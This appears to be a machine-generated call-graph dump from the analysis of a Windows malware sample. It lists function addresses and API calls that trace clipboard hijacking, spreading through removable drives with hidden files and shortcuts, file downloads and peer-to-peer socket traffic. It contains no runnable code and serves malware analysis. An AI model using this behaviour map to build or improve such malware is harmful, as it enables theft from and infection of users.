5671 40b4f0 shutdown closesocket 5419->5671 5420->5404 5420->5412 5422 4019e9 5420->5422 5632 4022c0 5420->5632 5423 401cf0 7 API calls 5422->5423 5423->5404 5425 40d934 5424->5425 5426 40bbb0 5 API calls 5425->5426 5427 40d950 WaitForSingleObject 5425->5427 5429 40d975 5425->5429 5685 40d550 InterlockedExchangeAdd 5425->5685 5426->5425 5427->5425 5427->5429 5431 40a740 7 API calls 5430->5431 5432 4013bb CreateEventA socket 5431->5432 5433 4013f2 5432->5433 5437 4013f8 5432->5437 5434 401330 7 API calls 5433->5434 5434->5437 5435 401401 bind 5438 401444 CreateThread 5435->5438 5439 401434 5435->5439 5436 401462 5436->5377 5437->5435 5437->5436 5438->5436 5460 401100 5438->5460 5440 401330 7 API calls 5439->5440 5441 40143a 5440->5441 5441->5377 5443 40bbe7 LeaveCriticalSection 5442->5443 5444 40bbcf 5442->5444 5443->5377 5445 40c870 3 API calls 5444->5445 5446 40bbda 5445->5446 5446->5443 5489 40be30 5447->5489 5451 401339 5450->5451 5459 40139b 5450->5459 5452 401341 SetEvent WaitForSingleObject 5451->5452 5451->5459 5457 401362 5452->5457 5453 40138b 5528 40b4f0 shutdown closesocket 5453->5528 5455 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5455->5457 5456 401395 5458 40ab60 __aligned_recalloc_base 3 API calls 5456->5458 5457->5453 5457->5455 5458->5459 5459->5380 5461 401115 ioctlsocket 5460->5461 5462 4011e4 5461->5462 5468 40113a 5461->5468 5464 40ab60 __aligned_recalloc_base 3 API calls 5462->5464 5463 4011cd WaitForSingleObject 5463->5461 5463->5462 5465 4011ea 5464->5465 5466 40a990 9 API calls 5466->5468 5467 401168 recvfrom 5467->5463 5467->5468 5468->5463 5468->5466 5468->5467 5469 4011ad InterlockedExchangeAdd 5468->5469 5471 401000 5469->5471 5472 401014 5471->5472 5474 40a740 7 API calls 5472->5474 5476 40103b 5472->5476 5474->5476 5475 40105b 5483 401580 5475->5483 5482 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5476->5482 5478 4010ec 5478->5468 5479 4010a3 IsBadReadPtr 5481 401071 5479->5481 5480 4010d8 memmove 5480->5481 5481->5478 5481->5479 5481->5480 5482->5475 5484 401592 5483->5484 5485 4015a5 memcpy 5483->5485 5486 40a990 9 API calls 5484->5486 5488 4015c1 5485->5488 5487 40159f 5486->5487 5487->5485 5488->5481 5490 40c8b0 3 API calls 5489->5490 5491 40be3b 5490->5491 5492 40be57 lstrlenA 5491->5492 5493 40cb40 7 API calls 5492->5493 5494 40be8d 5493->5494 5495 40beb8 5494->5495 5500 40dfa0 5494->5500 5503 40d6b0 5494->5503 5495->5377 5496 40beac 5497 40ab60 __aligned_recalloc_base 3 API calls 5496->5497 5497->5495 5508 401200 5500->5508 5502 40dfc2 5502->5496 5524 40d710 5503->5524 5506 40d6de 5506->5496 5507 40d710 send 5507->5506 5509 40121d 5508->5509 5522 401314 5508->5522 5510 40a950 __aligned_recalloc_base 7 API calls 5509->5510 5509->5522 5511 401247 memcpy htons 5510->5511 5512 401297 sendto 5511->5512 5517 4012ed 5511->5517 5514 4012b6 InterlockedExchangeAdd 5512->5514 5515 4012e9 5512->5515 5513 40ab60 __aligned_recalloc_base 3 API calls 5518 4012fc 5513->5518 5514->5512 5519 4012cc 5514->5519 5516 40130a 5515->5516 5515->5517 5520 40ab60 __aligned_recalloc_base 3 API calls 5516->5520 5517->5513 5518->5502 5521 40ab60 __aligned_recalloc_base 3 API calls 5519->5521 5520->5522 5523 4012db 5521->5523 5522->5502 5523->5502 5525 40d721 send 5524->5525 5526 40d6c3 5525->5526 5527 40d73e 5525->5527 5526->5506 5526->5507 5527->5525 5527->5526 5528->5456 5530 401ef2 InterlockedDecrement setsockopt closesocket 5529->5530 5531 401d74 5529->5531 5548 401e39 5530->5548 5531->5530 5532 401d7c 5531->5532 5549 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5532->5549 5534 401d81 InterlockedExchange 5535 401d98 5534->5535 5536 401e4e 5534->5536 5541 401da9 InterlockedDecrement 5535->5541 5542 401dbc InterlockedDecrement InterlockedExchangeAdd 5535->5542 5535->5548 5537 401e67 5536->5537 5538 401e57 InterlockedDecrement 5536->5538 5539 401e72 5537->5539 5540 401e87 InterlockedDecrement 5537->5540 5538->5387 5558 401ae0 WSASend 5539->5558 5544 401ee9 5540->5544 5541->5387 5545 401e2f 5542->5545 5544->5387 5550 401cf0 5545->5550 5546 401e7e 5546->5387 5548->5387 5549->5534 5551 401d00 InterlockedExchangeAdd 5550->5551 5552 401cfc 5550->5552 5553 401d53 5551->5553 5554 401d17 InterlockedIncrement 5551->5554 5552->5548 5553->5548 5564 401c50 WSARecv 5554->5564 5556 401d46 5556->5553 5557 401d4c InterlockedDecrement 5556->5557 5557->5553 5559 401b50 5558->5559 5560 401b12 WSAGetLastError 5558->5560 5559->5546 5560->5559 5561 401b1f 5560->5561 5562 401b56 5561->5562 5563 401b26 Sleep WSASend 5561->5563 5562->5546 5563->5559 5563->5560 5565 401cd2 5564->5565 5566 401c8e 5564->5566 5565->5556 5567 401c90 WSAGetLastError 5566->5567 5568 401ca4 Sleep WSARecv 5566->5568 5569 401cdb 5566->5569 5567->5565 5567->5566 5568->5565 5568->5567 5569->5556 5571 401483 5570->5571 5572 401572 5570->5572 5571->5572 5573 40a740 7 API calls 5571->5573 5572->5390 5574 401498 CreateEventA socket 5573->5574 5575 4014d5 5574->5575 5576 4014cf 5574->5576 5575->5572 5578 4014e2 htons setsockopt bind 5575->5578 5577 401330 7 API calls 5576->5577 5577->5575 5579 401546 5578->5579 5580 401558 CreateThread 5578->5580 5581 401330 7 API calls 5579->5581 5580->5572 5583 401100 20 API calls __aligned_recalloc_base 5580->5583 5582 40154c 5581->5582 5582->5390 5585 4021cf 5584->5585 5586 4021bb 5584->5586 5585->5397 5585->5398 5586->5585 5609 402020 5586->5609 5589 40160d 5588->5589 5608 401737 5588->5608 5590 401619 EnterCriticalSection 5589->5590 5589->5608 5591 401630 5590->5591 5592 4016b5 LeaveCriticalSection SetEvent 5590->5592 5591->5592 5595 401641 InterlockedDecrement 5591->5595 5598 40165a InterlockedExchangeAdd 5591->5598 5606 4016a0 InterlockedDecrement 5591->5606 5593 4016d0 5592->5593 5594 4016e8 5592->5594 5596 4016d6 PostQueuedCompletionStatus 5593->5596 5597 40dd50 11 API calls 5594->5597 5595->5591 5596->5594 5596->5596 5599 4016f3 5597->5599 5598->5591 5600 40166d InterlockedIncrement 5598->5600 5601 40de90 6 API calls 5599->5601 5602 401c50 4 API calls 5600->5602 5603 4016fc CloseHandle CloseHandle WSACloseEvent 5601->5603 5602->5591 5631 40b4f0 shutdown closesocket 5603->5631 5605 401724 DeleteCriticalSection 5607 40ab60 __aligned_recalloc_base 3 API calls 5605->5607 5606->5591 5607->5608 5608->5397 5610 40a740 7 API calls 5609->5610 5611 40202b 5610->5611 5612 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5611->5612 5613 4021aa 5611->5613 5614 402076 CreateIoCompletionPort 5612->5614 5615 40219f 5612->5615 5613->5585 5614->5615 5616 40208f 5614->5616 5617 401600 35 API calls 5615->5617 5618 40dbb0 8 API calls 5616->5618 5619 4021a5 5617->5619 5620 402094 5618->5620 5619->5613 5620->5615 5621 40209f WSASocketA 5620->5621 5621->5615 5622 4020bd setsockopt htons bind 5621->5622 5622->5615 5623 402126 listen 5622->5623 5623->5615 5624 40213a WSACreateEvent 5623->5624 5624->5615 5625 402147 WSAEventSelect 5624->5625 5625->5615 5626 402159 5625->5626 5627 40217f 5626->5627 5628 40dbe0 319 API calls 5626->5628 5629 40dbe0 319 API calls 5627->5629 5628->5626 5630 402194 5629->5630 5630->5585 5631->5605 5633 4022d2 EnterCriticalSection 5632->5633 5634 4022cd 5632->5634 5635 4022e7 5633->5635 5636 4022fd LeaveCriticalSection 5633->5636 5634->5420 5635->5636 5637 402308 5636->5637 5638 40230f 5636->5638 5637->5420 5639 40a740 7 API calls 5638->5639 5640 402319 5639->5640 5641 402326 getpeername CreateIoCompletionPort 5640->5641 5642 4023b8 5640->5642 5643 4023b2 5641->5643 5644 402366 5641->5644 5674 40b4f0 shutdown closesocket 5642->5674 5647 40ab60 __aligned_recalloc_base 3 API calls 5643->5647 5672 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5644->5672 5647->5642 5648 4023c3 5648->5420 5649 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5673 4021e0 EnterCriticalSection LeaveCriticalSection 5649->5673 5651 4023ab 5651->5420 5653 401830 5652->5653 5661 40190f 5652->5661 5654 40183d InterlockedExchangeAdd 5653->5654 5653->5661 5655 401854 5654->5655 5654->5661 5656 401880 5655->5656 5655->5661 5675 4017a0 EnterCriticalSection 5655->5675 5657 401891 5656->5657 5684 40b4f0 shutdown closesocket 5656->5684 5660 4018a7 InterlockedDecrement 5657->5660 5662 401901 5657->5662 5660->5662 5661->5409 5663 402247 5662->5663 5664 402265 EnterCriticalSection 5662->5664 5663->5409 5665 40229c LeaveCriticalSection DeleteCriticalSection 5664->5665 5668 40227d 5664->5668 5666 40ab60 __aligned_recalloc_base 3 API calls 5665->5666 5666->5663 5667 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5667->5668 5668->5667 5669 40229b 5668->5669 5669->5665 5670->5419 5671->5419 5672->5649 5673->5651 5674->5648 5676 401807 LeaveCriticalSection 5675->5676 5677 4017ba InterlockedExchangeAdd 5675->5677 5676->5655 5678 4017d9 5677->5678 5679 4017ca LeaveCriticalSection 5677->5679 5680 40ab60 __aligned_recalloc_base 3 API calls 5678->5680 5679->5655 5681 4017fe 5680->5681 5682 40ab60 __aligned_recalloc_base 3 API calls 5681->5682 5683 401804 5682->5683 5683->5676 5684->5657 5686 40d56d 5685->5686 5696 40d566 5685->5696 5702 40d840 5686->5702 5689 40d58d InterlockedIncrement 5699 40d597 5689->5699 5690 40bed0 18 API calls 5690->5699 5691 40d5c0 5710 40b3d0 inet_ntoa 5691->5710 5693 40d5cc 5694 40d690 InterlockedDecrement 5693->5694 5709 40b4f0 shutdown closesocket 5694->5709 5696->5425 5697 40a950 __aligned_recalloc_base 7 API calls 5697->5699 5698 40d770 6 API calls 5698->5699 5699->5690 5699->5691 5699->5694 5699->5697 5699->5698 5701 40ab60 __aligned_recalloc_base 3 API calls 5699->5701 5711 40bf20 5699->5711 5701->5699 5703 40d84d socket 5702->5703 5704 40d862 htons connect 5703->5704 5705 40d8bf 5703->5705 5704->5705 5707 40d8aa 5704->5707 5705->5703 5706 40d57d 5705->5706 5706->5689 5706->5696 5725 40b4f0 shutdown closesocket 5707->5725 5709->5696 5710->5693 5722 40bf31 5711->5722 5714 40ab60 __aligned_recalloc_base 3 API calls 5715 40c2ff 5714->5715 5715->5699 5716 40bf4f 5716->5714 5717 40c310 26 API calls 5717->5722 5718 40b830 31 API calls 5718->5722 5721 40bed0 18 API calls 5721->5722 5722->5716 5722->5717 5722->5718 5722->5721 5726 40c460 5722->5726 5733 40bc00 EnterCriticalSection 5722->5733 5738 407240 5722->5738 5743 4072e0 5722->5743 5748 407110 5722->5748 5755 407210 5722->5755 5725->5706 5727 40c471 lstrlenA 5726->5727 5728 40cb40 7 API calls 5727->5728 5731 40c48f 5728->5731 5729 40c49b 5730 40c51f 5729->5730 5732 40ab60 __aligned_recalloc_base 3 API calls 5729->5732 5730->5722 5731->5727 5731->5729 5732->5730 5735 40bc18 5733->5735 5734 40bc54 LeaveCriticalSection 5734->5722 5735->5734 5758 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5735->5758 5737 40bc43 5737->5734 5759 407280 5738->5759 5741 407279 5741->5722 5742 40dbe0 330 API calls 5742->5741 5744 407280 75 API calls 5743->5744 5745 4072ff 5744->5745 5746 40732c 5745->5746 5774 407340 5745->5774 5746->5722 5777 405fe0 EnterCriticalSection 5748->5777 5750 40712a 5754 40715d 5750->5754 5782 407170 5750->5782 5753 40ab60 __aligned_recalloc_base 3 API calls 5753->5754 5754->5722 5789 4060a0 EnterCriticalSection 5755->5789 5757 407232 5757->5722 5758->5737 5762 407293 5759->5762 5760 407254 5760->5741 5760->5742 5762->5760 5763 405ef0 EnterCriticalSection 5762->5763 5764 40d1d0 71 API calls 5763->5764 5765 405f0e 5764->5765 5766 405fcb LeaveCriticalSection 5765->5766 5767 405f27 5765->5767 5771 405f48 5765->5771 5766->5762 5768 405f31 memcpy 5767->5768 5769 405f46 5767->5769 5768->5769 5770 40ab60 __aligned_recalloc_base 3 API calls 5769->5770 5772 405fc8 5770->5772 5771->5769 5773 405fa6 memcpy 5771->5773 5772->5766 5773->5769 5775 40be30 18 API calls 5774->5775 5776 407385 5775->5776 5776->5746 5778 405ffe 5777->5778 5779 40608a LeaveCriticalSection 5778->5779 5780 40abd0 8 API calls 5778->5780 5779->5750 5781 40605c 5780->5781 5781->5779 5783 40a950 __aligned_recalloc_base 7 API calls 5782->5783 5784 407182 memcpy 5783->5784 5785 40be30 18 API calls 5784->5785 5786 4071ec 5785->5786 5787 40ab60 __aligned_recalloc_base 3 API calls 5786->5787 5788 407151 5787->5788 5788->5753 5814 40d230 5789->5814 5792 4062e3 LeaveCriticalSection 5792->5757 5793 40d1d0 71 API calls 5796 4060d9 5793->5796 5794 4061f8 5795 406221 5794->5795 5798 405d30 70 API calls 5794->5798 5799 40ab60 __aligned_recalloc_base 3 API calls 5795->5799 5796->5792 5796->5794 5797 406134 memcpy 5796->5797 5800 40ab60 __aligned_recalloc_base 3 API calls 5797->5800 5798->5795 5801 406242 5799->5801 5802 406158 5800->5802 5801->5792 5803 406251 CreateFileW 5801->5803 5804 40abd0 8 API calls 5802->5804 5803->5792 5805 406274 5803->5805 5806 406168 5804->5806 5809 406291 WriteFile 5805->5809 5810 4062cf FlushFileBuffers 5805->5810 5807 40ab60 __aligned_recalloc_base 3 API calls 5806->5807 5808 40618f 5807->5808 5811 40cb40 7 API calls 5808->5811 5809->5805 5810->5792 5812 4061c5 5811->5812 5813 4076c0 66 API calls 5812->5813 5813->5794 5817 40c780 5814->5817 5818 40c791 5817->5818 5819 40abd0 8 API calls 5818->5819 5820 40c7ab 5818->5820 5821 40c6e0 70 API calls 5818->5821 5824 4084a0 68 API calls 5818->5824 5825 40c7eb memcmp 5818->5825 5819->5818 5822 40ab60 __aligned_recalloc_base 3 API calls 5820->5822 5821->5818 5823 4060c2 5822->5823 5823->5792 5823->5793 5824->5818 5825->5818 5825->5820 5829 407840 5826->5829 5827 407868 Sleep 5827->5829 5828 40791a Sleep 5828->5829 5829->5827 5829->5828 5830 407897 Sleep wsprintfA DeleteUrlCacheEntry 5829->5830 5832 40f560 58 API calls 5829->5832 5857 40f4b0 InternetOpenA 5830->5857 5832->5829 5834 4058c9 memset GetModuleHandleW 5833->5834 5835 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5834->5835 5835->5835 5836 405940 CreateWindowExW 5835->5836 5837 40596b 5836->5837 5838 40596d GetMessageA 5836->5838 5839 40599f ExitThread 5837->5839 5840 405981 TranslateMessage DispatchMessageA 5838->5840 5841 405997 5838->5841 5840->5838 5841->5834 5841->5839 5864 40f1f0 CreateFileW 5842->5864 5844 4070f8 ExitThread 5846 406fa0 5846->5844 5847 4070e8 Sleep 5846->5847 5848 406fd9 5846->5848 5867 4063e0 GetLogicalDrives 5846->5867 5847->5846 5873 406300 5848->5873 5851 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5853 407086 wsprintfW 5851->5853 5854 40709b wsprintfW 5851->5854 5852 40700b 5853->5854 5879 4068e0 _chkstk 5854->5879 5858 40f4d6 InternetOpenUrlA 5857->5858 5859 40f548 Sleep 5857->5859 5860 40f4f5 HttpQueryInfoA 5858->5860 5861 40f53e InternetCloseHandle 5858->5861 5859->5829 5862 40f534 InternetCloseHandle 5860->5862 5863 40f51e 5860->5863 5861->5859 5862->5861 5863->5862 5865 40f238 5864->5865 5866 40f21f GetFileSize 5864->5866 5865->5846 5866->5865 5872 40640d 5867->5872 5868 406486 5868->5846 5869 40641c RegOpenKeyExW 5870 40643e RegQueryValueExW 5869->5870 5869->5872 5871 40647a RegCloseKey 5870->5871 5870->5872 5871->5872 5872->5868 5872->5869 5872->5871 5874 406359 5873->5874 5875 40631c 5873->5875 5874->5851 5874->5852 5938 406360 GetDriveTypeW 5875->5938 5878 40634b lstrcpyW 5878->5874 5880 4068f7 5879->5880 5881 4068fe 7 API calls 5879->5881 5880->5852 5882 4069d2 5881->5882 5883 406a14 PathFileExistsW 5881->5883 5886 40f1f0 2 API calls 5882->5886 5884 406ac4 5883->5884 5885 406a29 PathFileExistsW 5883->5885 5889 406af5 PathFileExistsW 5884->5889 5943 4064a0 7 API calls 5884->5943 5887 406a59 PathFileExistsW 5885->5887 5888 406a3a SetFileAttributesW DeleteFileW 5885->5888 5890 4069de 5886->5890 5893 406a6a CreateDirectoryW 5887->5893 5894 406a8c PathFileExistsW 5887->5894 5888->5887 5891 406b06 5889->5891 5892 406b47 PathFileExistsW 5889->5892 5890->5883 5896 4069f5 SetFileAttributesW DeleteFileW 5890->5896 5897 40f1f0 2 API calls 5891->5897 5899 406b58 5892->5899 5900 406bca PathFileExistsW 5892->5900 5893->5894 5898 406a7d SetFileAttributesW 5893->5898 5894->5884 5901 406a9d CopyFileW 5894->5901 5896->5883 5903 406b12 5897->5903 5898->5894 5899->5900 5904 406b64 PathFileExistsW 5899->5904 5906 406c75 FindFirstFileW 5900->5906 5907 406bdf PathFileExistsW 5900->5907 5901->5884 5905 406ab5 SetFileAttributesW 5901->5905 5902 406ad4 5902->5889 5912 40f1f0 2 API calls 5902->5912 5903->5892 5908 406b28 SetFileAttributesW DeleteFileW 5903->5908 5904->5900 5909 406b73 CopyFileW 5904->5909 5905->5884 5906->5880 5935 406c9c 5906->5935 5910 406bf0 5907->5910 5911 406c2c 5907->5911 5908->5892 5909->5900 5915 406b8b SetFileAttributesW PathFileExistsW 5909->5915 5916 406c12 5910->5916 5917 406bf8 5910->5917 5913 406c34 5911->5913 5914 406c4e 5911->5914 5919 406aed 5912->5919 5922 406660 4 API calls 5913->5922 5923 406660 4 API calls 5914->5923 5915->5900 5924 406bab SetFileAttributesW DeleteFileW 5915->5924 5921 406660 4 API calls 5916->5921 5954 406660 CoInitialize CoCreateInstance 5917->5954 5918 406d5e lstrcmpW 5920 406d74 lstrcmpW 5918->5920 5918->5935 5919->5889 5920->5935 5927 406c0d SetFileAttributesW 5921->5927 5922->5927 5923->5927 5924->5900 5926 406f35 FindNextFileW 5926->5918 5929 406f51 FindClose 5926->5929 5927->5906 5929->5880 5930 406dba lstrcmpiW 5930->5935 5931 406e21 PathMatchSpecW 5933 406e42 wsprintfW SetFileAttributesW DeleteFileW 5931->5933 5931->5935 5932 406e9f PathFileExistsW 5934 406eb5 wsprintfW wsprintfW 5932->5934 5932->5935 5933->5935 5934->5935 5936 406f1f MoveFileExW 5934->5936 5935->5918 5935->5926 5935->5930 5935->5931 5935->5932 5959 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5935->5959 5936->5926 5939 40633f 5938->5939 5940 406388 5938->5940 5939->5874 5939->5878 5940->5939 5941 40639c QueryDosDeviceW 5940->5941 5941->5939 5942 4063b6 StrCmpNW 5941->5942 5942->5939 5944 406640 InternetCloseHandle 5943->5944 5945 40653e InternetOpenUrlW 5943->5945 5944->5902 5946 406633 InternetCloseHandle 5945->5946 5947 40656b CreateFileW 5945->5947 5946->5944 5948 406626 5947->5948 5949 406598 InternetReadFile 5947->5949 5948->5946 5950 4065eb wsprintfW DeleteFileW 5949->5950 5951 4065bc 5949->5951 5950->5948 5951->5950 5952 4065c5 WriteFile 5951->5952 5952->5949 5955 406696 5954->5955 5958 4066ee 5954->5958 5956 4066a9 wsprintfW 5955->5956 5957 4066cf wsprintfW 5955->5957 5955->5958 5956->5958 5957->5958 5958->5927 5960 4067f5 lstrcmpW 5959->5960 5961 4068cf 5959->5961 5962 406821 5960->5962 5963 40680b lstrcmpW 5960->5963 5961->5935 5965 40689c FindNextFileW 5962->5965 5963->5962 5964 406823 wsprintfW wsprintfW 5963->5964 5964->5962 5966 406886 MoveFileExW 5964->5966 5965->5960 5967 4068b8 FindClose RemoveDirectoryW 5965->5967 5966->5965 5967->5961 6200 40eba1 6202 40ebaa 6200->6202 6201 40ec9d 6202->6201 6203 40ec13 lstrcmpiW 6202->6203 6204 40ec93 SysFreeString 6203->6204 6205 40ec26 6203->6205 6204->6201 6206 40e990 2 API calls 6205->6206 6208 40ec34 6206->6208 6207 40ec85 6207->6204 6208->6204 6208->6207 6209 40ec63 lstrcmpiW 6208->6209 6210 40ec75 6209->6210 6211 40ec7b SysFreeString 6209->6211 6210->6211 6211->6207 6212 406de4 6214 406d8a 6212->6214 6213 406dba lstrcmpiW 6213->6214 6214->6213 6215 406f35 FindNextFileW 6214->6215 6218 406e21 PathMatchSpecW 6214->6218 6220 406e9f PathFileExistsW 6214->6220 6225 4067a0 11 API calls 6214->6225 6216 406f51 FindClose 6215->6216 6217 406d5e lstrcmpW 6215->6217 6221 406f5e 6216->6221 6217->6214 6219 406d74 lstrcmpW 6217->6219 6218->6214 6222 406e42 wsprintfW SetFileAttributesW DeleteFileW 6218->6222 6219->6214 6220->6214 6223 406eb5 wsprintfW wsprintfW 6220->6223 6222->6214 6223->6214 6224 406f1f MoveFileExW 6223->6224 6224->6215 6225->6214 6074 406085 6076 405ffe 6074->6076 6075 40608a LeaveCriticalSection 6076->6075 6077 40abd0 8 API calls 6076->6077 6078 40605c 6077->6078 6078->6075 6079 406fc6 6082 406fa8 6079->6082 6080 4070e8 Sleep 6080->6082 6081 406fd9 6083 406300 4 API calls 6081->6083 6082->6080 6082->6081 6084 4070f8 ExitThread 6082->6084 6085 4063e0 4 API calls 6082->6085 6087 406fea 6083->6087 6085->6082 6086 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6089 407086 wsprintfW 6086->6089 6090 40709b wsprintfW 6086->6090 6087->6086 6088 40700b 6087->6088 6089->6090 6091 4068e0 79 API calls 6090->6091 6091->6088 6092 40f908 6093 40f910 6092->6093 6095 40f9c4 6093->6095 6098 40fb45 6093->6098 6097 40f949 6097->6095 6102 40fa30 RtlUnwind 6097->6102 6099 40fb5a 6098->6099 6101 40fb76 6098->6101 6100 40fbe5 NtQueryVirtualMemory 6099->6100 6099->6101 6100->6101 6101->6097 6103 40fa48 6102->6103 6103->6097 6226 40792a ExitThread 5968 4059b0 GetWindowLongW 5969 4059d4 5968->5969 5970 4059f6 5968->5970 5971 4059e1 5969->5971 5972 405a67 IsClipboardFormatAvailable 5969->5972 5973 4059f1 5970->5973 5977 405a46 5970->5977 5978 405a2e SetWindowLongW 5970->5978 5974 405a04 SetClipboardViewer SetWindowLongW 5971->5974 5975 4059e7 5971->5975 5979 405a83 IsClipboardFormatAvailable 5972->5979 5980 405a7a 5972->5980 5976 405be4 DefWindowProcA 5973->5976 5974->5976 5975->5973 5982 405b9d RegisterRawInputDevices ChangeClipboardChain 5975->5982 5977->5973 5983 405a4c SendMessageA 5977->5983 5978->5973 5979->5980 5981 405a98 IsClipboardFormatAvailable 5979->5981 5984 405ab5 OpenClipboard 5980->5984 5985 405b7f 5980->5985 5981->5980 5982->5976 5983->5973 5984->5985 5986 405ac5 GetClipboardData 5984->5986 5985->5973 5987 405b85 SendMessageA 5985->5987 5986->5973 5988 405add GlobalLock 5986->5988 5987->5973 5988->5973 5989 405af5 5988->5989 5990 405b08 5989->5990 5991 405b29 5989->5991 5993 405b3e 5990->5993 5994 405b0e 5990->5994 5992 40d250 13 API calls 5991->5992 5995 405b14 GlobalUnlock CloseClipboard 5992->5995 6010 4057f0 5993->6010 5994->5995 6004 405680 5994->6004 5995->5985 5999 405b67 5995->5999 6018 404970 lstrlenW 5999->6018 6002 40ab60 __aligned_recalloc_base 3 API calls 6003 405b7c 6002->6003 6003->5985 6005 40568b 6004->6005 6006 405691 lstrlenW 6005->6006 6007 4056a4 6005->6007 6008 40a950 __aligned_recalloc_base 7 API calls 6005->6008 6009 4056c1 lstrcpynW 6005->6009 6006->6005 6006->6007 6007->5995 6008->6005 6009->6005 6009->6007 6015 4057fd 6010->6015 6011 405803 lstrlenA 6012 405816 6011->6012 6011->6015 6012->5995 6013 405740 2 API calls 6013->6015 6014 40a950 __aligned_recalloc_base 7 API calls 6014->6015 6015->6011 6015->6012 6015->6013 6015->6014 6017 40ab60 __aligned_recalloc_base 3 API calls 6015->6017 6052 4057a0 6015->6052 6017->6015 6026 4049a4 6018->6026 6019 404bfd 6019->6002 6020 404e81 StrStrW 6021 404e94 6020->6021 6022 404e98 StrStrW 6020->6022 6021->6022 6024 404eab 6022->6024 6025 404eaf StrStrW 6022->6025 6023 404c0f 6023->6019 6023->6020 6024->6025 6027 404ec2 6025->6027 6026->6019 6026->6023 6029 404d90 StrStrW 6026->6029 6036 404ed8 6027->6036 6057 4048a0 lstrlenW 6027->6057 6029->6023 6030 404dbb StrStrW 6029->6030 6030->6023 6031 404de6 StrStrW 6030->6031 6031->6023 6032 4054aa StrStrW 6037 4054c4 StrStrW 6032->6037 6038 4054bd 6032->6038 6033 40544f StrStrW 6034 405462 6033->6034 6035 40546b StrStrW 6033->6035 6034->6032 6035->6034 6041 405487 StrStrW 6035->6041 6036->6019 6036->6032 6036->6033 6039 4054d7 6037->6039 6040 4054de StrStrW 6037->6040 6038->6037 6039->6040 6042 4054f1 6040->6042 6043 4054f8 StrStrW 6040->6043 6041->6034 6042->6043 6044 405512 StrStrW 6043->6044 6045 40550b 6043->6045 6046 405525 lstrlenA 6044->6046 6045->6044 6046->6019 6048 4055ff GlobalAlloc 6046->6048 6048->6019 6049 40561a GlobalLock 6048->6049 6049->6019 6050 40562d memcpy GlobalUnlock OpenClipboard 6049->6050 6050->6019 6051 40565a EmptyClipboard SetClipboardData CloseClipboard 6050->6051 6051->6019 6053 4057ab 6052->6053 6054 4057b1 lstrlenA 6053->6054 6055 405740 2 API calls 6053->6055 6056 4057e4 6053->6056 6054->6053 6055->6053 6056->6015 6061 4048c4 6057->6061 6058 40490d 6058->6036 6059 404911 iswalpha 6060 40492c iswdigit 6059->6060 6059->6061 6060->6061 6061->6058 6061->6059 6061->6060 6118 40db50 6123 401b60 6118->6123 6120 40db65 6121 401b60 16 API calls 6120->6121 6122 40db84 6120->6122 6121->6122 6124 401b70 6123->6124 6142 401c42 6123->6142 6125 40a740 7 API calls 6124->6125 6124->6142 6126 401b9d 6125->6126 6127 40abd0 8 API calls 6126->6127 6126->6142 6128 401bc9 6127->6128 6129 401be6 6128->6129 6130 401bd6 6128->6130 6132 401ae0 4 API calls 6129->6132 6131 40ab60 __aligned_recalloc_base 3 API calls 6130->6131 6133 401bdc 6131->6133 6134 401bf3 6132->6134 6133->6120 6135 401c33 6134->6135 6136 401bfc EnterCriticalSection 6134->6136 6137 40ab60 __aligned_recalloc_base 3 API calls 6135->6137 6138 401c13 6136->6138 6139 401c1f LeaveCriticalSection 6136->6139 6140 401c3c 6137->6140 6138->6139 6139->6120 6141 40ab60 __aligned_recalloc_base 3 API calls 6140->6141 6141->6142 6142->6120 6143 40df50 6144 40bf20 330 API calls 6143->6144 6145 40df88 6144->6145 6146 40d510 6151 40b6f0 6146->6151 6149 40d550 330 API calls 6150 40d53a 6149->6150 6152 40b780 2 API calls 6151->6152 6153 40b6ff 6152->6153 6154 40b709 6153->6154 6155 40b70d EnterCriticalSection 6153->6155 6154->6149 6154->6150 6157 40b72c LeaveCriticalSection 6155->6157 6157->6154 6158 40f910 6159 40f92e 6158->6159 6161 40f9c4 6158->6161 6160 40fb45 NtQueryVirtualMemory 6159->6160 6163 40f949 6160->6163 6162 40fa30 RtlUnwind 6162->6163 6163->6161 6163->6162 6164 40d9d0 6165 40da3e 6164->6165 6166 40d9e6 6164->6166 6166->6165 6167 40d9f0 6166->6167 6168 40da43 6166->6168 6169 40da93 6166->6169 6172 40a740 7 API calls 6167->6172 6170 40da68 6168->6170 6171 40da5b InterlockedDecrement 6168->6171 6191 40c570 6169->6191 6174 40ab60 __aligned_recalloc_base 3 API calls 6170->6174 6171->6170 6175 40d9fd 6172->6175 6176 40da74 6174->6176 6187 4023d0 6175->6187 6178 40ab60 __aligned_recalloc_base 3 API calls 6176->6178 6178->6165 6180 40b6f0 4 API calls 6182 40da1f 6180->6182 6181 40dab9 6181->6165 6184 40daf1 IsBadReadPtr 6181->6184 6186 40bf20 330 API calls 6181->6186 6196 40c670 6181->6196 6182->6165 6183 40da2b InterlockedIncrement 6182->6183 6183->6165 6184->6181 6186->6181 6188 402413 6187->6188 6189 4023d9 6187->6189 6188->6180 6189->6188 6190 4023ea InterlockedIncrement 6189->6190 6190->6188 6192 40c583 6191->6192 6193 40c5ad memcpy 6191->6193 6194 40a990 9 API calls 6192->6194 6193->6181 6195 40c5a4 6194->6195 6195->6193 6197 40c699 6196->6197 6198 40c68e 6196->6198 6197->6198 6199 40c6b1 memmove 6197->6199 6198->6181 6199->6198 6227 4084f9 6228 408502 6227->6228 6229 408511 34 API calls 6228->6229 6230 409346 6228->6230 6231 405fbd 6232 405f51 6231->6232 6233 405fbb 6232->6233 6237 405fa6 memcpy 6232->6237 6234 40ab60 __aligned_recalloc_base 3 API calls 6233->6234 6235 405fc8 LeaveCriticalSection 6234->6235 6237->6233 6238 40ac3e 6239 40ab60 __aligned_recalloc_base 3 API calls 6238->6239 6242 40abfd 6239->6242 6240 40ac12 6241 40a950 __aligned_recalloc_base 7 API calls 6241->6242 6242->6240 6242->6241 6243 40ac14 memcpy 6242->6243 6243->6242

